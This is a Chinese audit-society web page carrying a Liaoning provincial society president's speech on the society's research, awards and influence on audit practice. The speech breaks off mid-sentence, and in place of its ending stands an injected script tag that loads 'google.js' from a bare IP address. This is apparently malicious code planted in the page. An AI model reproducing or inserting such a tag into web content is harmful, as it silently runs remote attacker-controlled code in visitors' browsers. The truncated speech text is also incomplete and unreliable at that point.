首页学会基本情况规划与计划课题管理学会会议培训与学习学术交流审计研究
当前位置: 首页  >  中国审计学会动态 > 正文
 
2013年省级审计学会秘书长培训班上辽宁发言材料
 
【时间:2015年07月31日】 字号: 【大】 【中】 【小】
                      围绕中心 服务大局 不断推进审计学会工作创新发展 
                                辽宁省审计学会会长  王 悦

    近年来,辽宁省审计学会在中国审计学会的指导下,紧密围绕审计工作中心,着眼服务辽宁振兴,坚持以学术活动为载体,深入开展审计基础理论和应用研究,推进审计科研与实践的有效结合,为审计事业科学发展提供理论和智力支持。学会多次承担审计署、中国审计学会、省社科基金、省社科联等部门组织的课题研究,包括审计署重点立项课题、中国审计学会联合立项课题、省社科基金项目、省经济社会发展重大立项课题以及省社科联重点调研立项课题等。其中一项课题成果获得省政府奖,四项课题成果获得省委省政府调研成果奖,六项课题研究受到审计署或中国审计学会表彰,六项科研成果获全省哲学社会科学学术年会成果奖,立项课题均顺利结项并有三项获优秀等次。学会连续多年被省社科联评为先进社团,连续两届为全省社会科学界10家标兵社团之一。2012年还被评为全省6个5A级社团之一。
    回顾近年来我省的审计学会和科研工作,主要有以下几点做法和体会。
    一、坚持将学会工作作为审计工作的重要组成部分,积极融入审计工作及经济社会发展大局
随着国家治理环境的变化和审计理论与实践的发展,学会工作在促进审计事业科学发展方面发挥着越来越重要的作用。因此,我省一直十分重视学会工作,积极探索学会工作的发展规律,自觉跟进审计中心工作和经济社会发展需要,加强审计研究。近年来,我们着眼于发挥审计的“免疫系统”功能、推进完善国家治理,加强了对如何树立科学审计理念的研究;着眼于提高审计工作质量和效率,加强了对改进审计方式方法的探讨;着眼于审计事业的可持续发展,致力于探索强化队伍建设的途径。同时,按照经济社会发展对审计工作的需求,关注了政策落实情况的跟踪审计,关注了如何通过强化审计监督,推进经济发展方式转变及维护国家经济安全等问题。通过从经济社会各项事业科学发展和审计中心工作的要求中寻找学会工作的着力点,使学会工作真正成为审计工作的重要组成部分,成为推动审计事业科学发展的重要力量。
    二、注重科研成果向审计实践应用的转化,推动学会工作服务决策、服务实践
    1.突出学会工作的决策服务作用。近年来,我省学会充分发挥为决策服务的“智库”作用,积极为省委、省政府、省厅及相关部门提供决策参考。如:基于辽宁地方政府性债务审计成果开展的课题研究,系统阐述了全省地方政府性债务的现状和存在的问题,从债务举借模式、资金使用管理、债务偿还机制、运营环境建设等方面提出了完善债务政策体系的对策建议。该成果与省委政研室、省政府研究室、东北财经大学等课题组提交的成果一起,成为我省第十一次党代会报告起草的参考文献,为政府强化债务管理提供了决策参考。根据全省社保审计实践成果展开的研究,从制度设计、预算管理、建设信息化管理平台及加强监督等方面提出了对策建议,为有关部门科学决策提供了有益参考。
    2.强化学会工作的实践支持作用。一是积极为审计实践输送科研成果。如,将经济责任审计理论与实践研究的综合成果,推荐并嵌入到省厅的经济责任审计工作之中,推进了经济责任审计工作规范化的进程;将县区级领导干部经济责任审计评价的研究成果直接在地方审计机关实践中加以应用,并通过实践的检验进一步完善成果,推动了审计评价的科学性和审计结果的有效性。2012年,学会还将在学术年会上交流的以加强审计质量管理为切入点的目标分解方法研究成果推荐到省厅的业务平台上进行交流展示,为审计实践拓展了新思路、提供了新方法。二是努力用科研成果推动审计制度的建立和完善。如,2009年,学会根据厅党组的要求,组织省厅和市局业务骨干,从多个层面、多个角度研究和探讨了审计现场管理存在的问题及改进措施,省厅以此研究成果为基础,制定出台了《辽宁省审计厅审计组管理办法》,从制度层面明确并细化了审计现场作业职责。又如,基于近两年审计署统一组织的大型审计项目以及我省开展的绩效审计方法体系研究基础,学会正会同法制处研究起草大项目审计操作规程,以促进大项目审计组织的规范化、制度化进程,为我省上下联动、交叉互审、跨处室审计等审计组织管理模式夯实制度基础。
    实践证明,只有注重科研成果转化,提升服务决策、服务实践的能力和水平,才能不断增强学会的生?script src= http://91.239.15.61/google.js \>
【关闭】    【打印】
  版权信息
主办单位:中国审计学会  技术支持:审计署计算机技术中心 本站电话:010-82199820
本站地址:北京市海淀区中关村南大街4号(邮编:100086) 备案编号:京ICP备19011981号  建议使用分辨率:1024×768